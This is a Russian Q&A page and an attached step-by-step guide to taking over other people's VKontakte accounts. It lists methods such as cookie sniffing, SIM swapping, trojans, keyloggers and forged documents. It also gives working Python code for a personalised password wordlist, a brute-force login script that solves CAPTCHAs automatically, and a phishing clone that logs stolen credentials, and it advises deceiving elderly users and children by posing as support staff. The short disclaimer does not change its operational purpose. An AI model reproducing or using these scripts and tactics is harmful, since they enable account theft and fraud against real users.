Как сейчас взламывают аккаунт во «ВКонтакте», ведь есть привязка к телефону?
Интернет
Технологии
» class=»question__header-menu»>
Ответить
«Баги» в самих социальных сетях, то есть ошибки в системе безопасности, которые заложены разработчиками, намеренно или случайно. Хакер использует разработанный или купленный exploit, что возможно благодаря уязвимости в самом сервере соц. сети. Пример
В
се В
озможно В
зломать. Если есть мозги и руки.
Если раньше взламывали через слабые пароли привязанной почты, то сейчас технология изменилась.
1. Можно телефон или ноутбук подключить к Wi-Fi
в Макдональдсе или в других общественных местах с беспроводным доступом в интернет. Через снифер Intercepter-NG
перехватывать cookie
людей подключенных к этой сети и читать сообщения Вконтакте. Но есть минус
: cookie временные и пароль к их аккаунту не получить.
2. Для этого есть бесчисленное количество брутфорсеров
, программ через которые можно подобрать
пароль к аккаунту методом ТЫК
а. Но только если такой пароль есть в сформированной .txt или .doc базе, которую можно создать самому или скачать в интернете. Но есть минус
: Брут бесполезен, если пароль придуманный или сгенерированный, типа такого: M#sd3zulk74uned09M
3. Про то что писал выше «ИРАКЛИЙ МИХАЙЛОВИЧ» я не согласен. Конечно можно произвести замену сим-карты
в салонах связи (если договориться за деньги или если работает знакомый). При условии если известен номер
телефона на которую привязан нужный нам аккаунт. Зайти не получиться
! Т.к. если двухфакторная аутентификация включена, услуга восстановления пароля по номеру телефона становится недоступной
. Исключение
: Если вы знаете логин и пароль от страницы, то способ прокатит.
4. Хотя можно попытаться обойти
«Подтверждение входа». При подключении двухфакторной аутентификации выдается 10 резервных кода
(пример одного такого кода: 8352 7035), которые позволят подтверждать вход, когда у вас нет доступа к телефону. Проблема
заключается в том, что бы зайти нужно подбирать этот код с определенного диапазона вручную
. Потому что
, если зайти через брут
, то после входа, код не будет действовать
. Т.е если у вас есть 1 код, можете войти — 1 раз без СМС. Кропотливая работа..
5. Если вы владеете знаниями
языка программирования
, то можете создать фишинговый сайт
. И с помощью vk.cc сократить и скрыть
настоящее название, что бы не возникало подозрения. Отправить ссылку жертве в виде рекламы
или создать фейк
, втереться в доверие и отправить сообщение с ссылкой (пример сообщения: Вот твои фотки с клуба #ССЫЛКА#
, по моему неплохо получилось =D ). Минус
данного способа: Служба администрации ВК может счесть ссылку подозрительной и не дать перейти по ней жертве.
6. Опять же, если вы знаете программирование
можете создать вирус
(троян к примеру) который перехватывает пароли с Android или Windows и отсылает к вам на почту. Минус
: может брандмауэр или антивирус запалить.
7. Писать в службу поддержки
по определенной схеме
и предоставить им поддельные данные
обработанные программами RF SCreater
и Adobe Photoshop
(только если вы им владеете на высочайшем уровне). Минус
: Если не прокатит, посадят далеко и надолго за подделку паспорта.
8. Если вы знакомы с жертвой, то можете установить ей keylogger.
Способов взлома много, всех их не перечислить, не описать и у каждого есть свои
минусы
.
Внимание
: Вся информация предоставлена исключительно в ознакомительных целях. Я не несу ответственности за любой возможный вред, причиненный материалами данной статьи.
Чтобы получить доступ к странице, нужно иметь верный логин и пароль. Для того, чтобы эти данные заполучить, нужно тем или иным способом выведать данные у владельца страницы (ВКонтакте не хранит пароли). Это фишинг, социальная инженерия, подбор пароля. Прикреплённый к странице номер телефона не предоставляет какую-то дополнительную защиту, а всего лишь является средством идентификации и инструментом по быстрому восстановлению пароля входа.
Всем тем пользователям, которые не особо понимают базовые правила безопасности стоит подключить «Подтверждение входа».
А причем тут привязка к телефону? Взломать пароль (а точнее увести) проще чем вам кажется. Например, есть специальные программы, которые работают скрытно от пользователя и собирают такую информацию как нажатые клавиши, посещенные сайты и т.п., а значит достаточно установить на ваш компьютер такую программу и все ваши пароли будут у хакера как на ладони. Одна из таких программ называется JETLOGGER, она не только сохраняет введенные пароли, но и может отправлять данные на электронную почту, например.
Ответить
Пошаговое руководство по взлому страницы ВКонтакте
В статье приводится несколько возможных способов взлома ВКонтакте, ориентированных на людей, недалёких в компьютерной безопасности.
Иными словами, при взломе будут использоваться не машинные, а человеческие уязвимости. Естественно, приведённые методы не универсальны (и слава богу!), и у кого-то может хватить мозгов на то, чтобы не поддаваться на ваши провокации. Но таких не так уж много, поверьте. Итак, начнём. Прежде всего, перед началом вам понадобятся страница, которую вы собираетесь «хакнуть», свободное время и безопасный доступ к ВКонтакте. Сам процесс взлома разделим на несколько шагов.
Прежде всего, нужно собрать как можно информации со страницы потенциальной жертвы, а именно:
-
- Неплохо было бы заиметь почту цели. Если человек не только попал в сеть, вы сможете найти почту путем простого гугления. К примеру, особо удобно отыскивать почту на mail.ru. Также можно попробовать поискать Ф.И.О. цели и дату рождения. Или же другого рода такие комбинации. Если жертва имеет Мой Мир на mail, то почта будет в коде страницы или же в URL.
В том случае, когда имеется почта без соц.сети от mail’a, почту можно выяснить, создав себе подставную почту на этом сервисе и поискав в мессенджере от мэйла. Как ещё один из способов, можно попробовать найти что-нибудь дельное с помощью аккаунтов цели в других социальных сетях. Например, попытаться пробить никнеймы из всех найденных аккаунтов по всем известным почтовым сервисам. Как вариант, можно попробовать использовать импорт почтовых контактов и предложение добавить этих людей в друзья. Регистрируем очередную фальшивую почту и получаем дополнительные аккаунты. Как альтернатива, можно попытать счастье, используя форму восстановления в Twitter’е, таким образом узнав часть почты. В FaceBook’е можно напрямую поискать аккаунт, введя почту в поиск.
- Неплохо было бы заиметь почту цели. Если человек не только попал в сеть, вы сможете найти почту путем простого гугления. К примеру, особо удобно отыскивать почту на mail.ru. Также можно попробовать поискать Ф.И.О. цели и дату рождения. Или же другого рода такие комбинации. Если жертва имеет Мой Мир на mail, то почта будет в коде страницы или же в URL.
На данном этапе мы будем пробовать получить доступ к аккаунту цели. Рассмотрим самые простые приёмы:
1) «Социнженер»
Здесь сразу нужно оговориться, что этот способ годиться только для тех, кто мало что знает об интернете, но решил по каким-либо причинам зарегистрироваться в соц.сети. Как правило, это либо старики, либо дети.
Если вы хотите просто попрактиковаться, то новички ВКонтакте могут быть найдены здесь. В данном случае, применяется один из законов психологии: человек, который не разбирается в чем-то, подсознательно доверяет тому, кто более опытен в конкретной области, и принимает его слова на веру. Тут можно создать аккаунт представителя техподдержки, создать «официальную» почту администрации и прочее. И создать какую-нибудь легенду. Что новые пользователи обязаны проходить проверку после регистрации и дать, например, ссылку на некий тест, по итогу или для входа которого требуется логин-пасс от вк. Самое важное, чтобы вы действовали осторожно. Следует убедить пользователя, что он в безопасности. Этот приём хорошо сочетается с фейком. Кроме того, продвинутые социнженеры могут, узнав номер юзера, позвонить (анонимно, используя sip) и развести напрямую. Кроме того, вся указанная вами информация (номер телефона/упоминание фактов с указанием дат/другое) также помогает установить контакт с жертвой и косвенно говорит о том, что вы из техподдержки.
2) «Умный» перебор
Метод, рассчитанный на среднестатистических пользователей. Для него нам надо будет специальный словарь, заточенный под конкретного человека. Давайте разберёмся со структурой нашего словаря:
- Личные данные. Сюда входят дата рождения (17.11.1992 = 1711, 1992, 17111992), возраст (1992, 2017 = 2017, 1992, 24), имя (Стас = stas, ctac) и фамилия (Иванов = ivanov).
- Аккаунты из других соц. сетей и почтовые сервисы (twitter.com/stasik_ku , facebook.com/stasss1992, stasss92@mail.ru = stasik_iv, stasss1992, stasss92).
- Увлечения (футбол, плавание, молодежка = football, swimming, molodejka, molodegka).
#! coding:utf-8 import sys,os razdel = ['_',':',';'] def uniq(seq): seen = set() seen_add = seen.add return [x for x in seq if not (x in seen or seen_add(x))] def brute_words(words): new_words = [] for i in words: new_words.append(i) new_words.append(i[0].upper() + i[1:]) new_words.append(i[0].upper() + i[1:-1] + i[-1].upper()) new_words.append(i.upper()) for j in spisok: new_words.append(i + j) for m in razdel: new_words.append(j + m + i) new_words.append(j + i) new_words.append(i * 2 + j) new_words.append(j * 2 + i) new_words.append(i[0].upper() + i[1:] + j) new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j) return uniq(new_words) def generate(words_file): o = open(words_file, 'r') words = o.read().splitlines() for i in brute_words(words): print(i) def main(): try: argv1 = sys.argv[1] generate(argv1) except IndexError: print("Нужно указать файл") except IOError: print("Нет такого файла") if __name__ == "__main__": main()
Из 14 получилось 1272 варианта. Приведу часть.
Molodegkactac MolodegkActac molodejka_molodegka Stasss92molodejka stasss92molodegka molodegka_stasss92 molodegka:stasss92 molodegka;stasss92 stasss1992swimming swimming_stasss1992 Kurayginctac KuraygiNctac kurayginkuraygin kuraygin_kuraygin molodegka17111992 1711199217111992molodegka molodegkamolodegka17111992 24 1711_24
Отлично, теперь автоматизируем перебор паролей через мобильную версию ВКонтакте небольшим скриптом.
#! coding: utf8 import grab, re, urllib2 from antigate import AntiGate from grab import GrabTimeoutError from time import sleep cap_key = '123 ' #Ваш ключ с Antigate def anti(key, file): #Получение решения Captcha с Antigate try: try: data = AntiGate(key, file) return data except KeyboardInterrupt: print("Завершение") except: anti(key, file) def save(url, file): #Скачивание файла по URL site = urllib2.urlopen(url) f = open(file, 'wb') f.write(site.read()) def cap_solve(img): save(img, 'captcha.jpg') key = anti(cap_key, 'captcha.jpg') return key def brute(login, passwords, save): out = open(save, 'w') psswrds = open(passwords,'r') try: int(login) prefix = True except: prefix = False g = grab.Grab() g.go('http://m.vk.com') for line in psswrds: psswrd = line.rstrip('rn') g.doc.set_input('email', login) g.doc.set_input('pass', psswrd) g.doc.submit() if g.doc.text_search(u'captcha'): all_captchas = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0] captcha = '' + all_captchas key = cap_solve(captcha) g.doc.set_input('email', login) g.doc.set_input('pass', psswrd) g.doc.set_input('captcha_key', str(key)) g.doc.submit() print("cap") if 'Подтвердить' in g.response.body: if prefix: prefix1 = g.doc.rex_search('+[0-9]*').group(0) prefix2 = g.doc.rex_search(' [0-9]*').group(0) pre1 = re.findall('[0-9]{1,}', prefix1)[0] pre2 = re.findall('[0-9]{1,}', prefix2)[0] login = login.replace(pre1, '') login = login.replace(pre2, '') g.set_input('code', login) g.submit() print(login + ':' + psswrd + '--success') out.write(login + ':' + psswrd + 'n') else: out.write(login + ':' + psswrd + 'n') else: if g.doc.rex_search('[^>]+').group(0) == 'Login | VK': print(login + ':' + psswrd + '--fail') else: print(login + ':' + psswrd + '--success') out.write(login + ':' + psswrd + 'n') out.close() psswrds.close()
Естественно, пример не оптимизирован. Можно ещё добавить прокси, многопоточность и прочие плюшки, но этим уже сами займётесь, если будет интересно. Зато скрипт способен сам вводить недостающие цифры в защиту ВКонтакте при заходе с другой страны, а также, используя Antigate, запросто вводит Captch’и, появляющиеся после 5-6 попытки ввода с одного IP.
3) «Фейк — наше все»
file --mime-encoding file.html
Затем меняем с исходной на новую
iconv -f iso-8859-1 -t utf-8 file.html > vk2.html
Далее вам нужно создать управление страницей на серверном языке.
@route('/') def index(): return template('vk2.html') @route('/Welcome! | VK_files/') def server_static(filepath): return static_file(filepath, root='./Welcome! | VK_files/')
Как выяснилось, на кое-каких файлах порой выдаётся ошибка 404. У нас, к сожалению, не имеется нужных картинок с сайта, так что положим их в отдельную папку images.
mkdir images cd images wget wget "" wget "" mkdir icons cd icons wget "" wget ""
Пропишем новый роутинг в скрипте.
@route('/images/') def server_static(filepath): return static_file(filepath, root='./images/')
@post('/') def index(): login = request.forms.get('email') password = request.forms.get('pass') print("|Catch|-------------- " + login + ':' + password) with open("log.txt", "a") as myfile: myfile.write(login + ':' + password + "n") return redirect('http://www.vk.com')
В заключении, переносим тег button, что под формой в коде в пределы формы и добавляем свойство type=»submit», и наслаждаемся тем, что всё работает. Для тех, у кого что-то не получилось, представляем архив с готовым решением.
Если вы желаете оптимизировать этот процесс и не хотите прописывать всё это ручками, то можете воспользоваться инструментом SET. (Social Engineer Toolkit).
Другие материалы по теме:
10 лучших ресурсов для изучения хакинга с помощью Kali Linux5 лучших Android приложений для взлома Wi-Fi сетей10 лучших инструментов для хакинга в 2017 году
Загрузка...
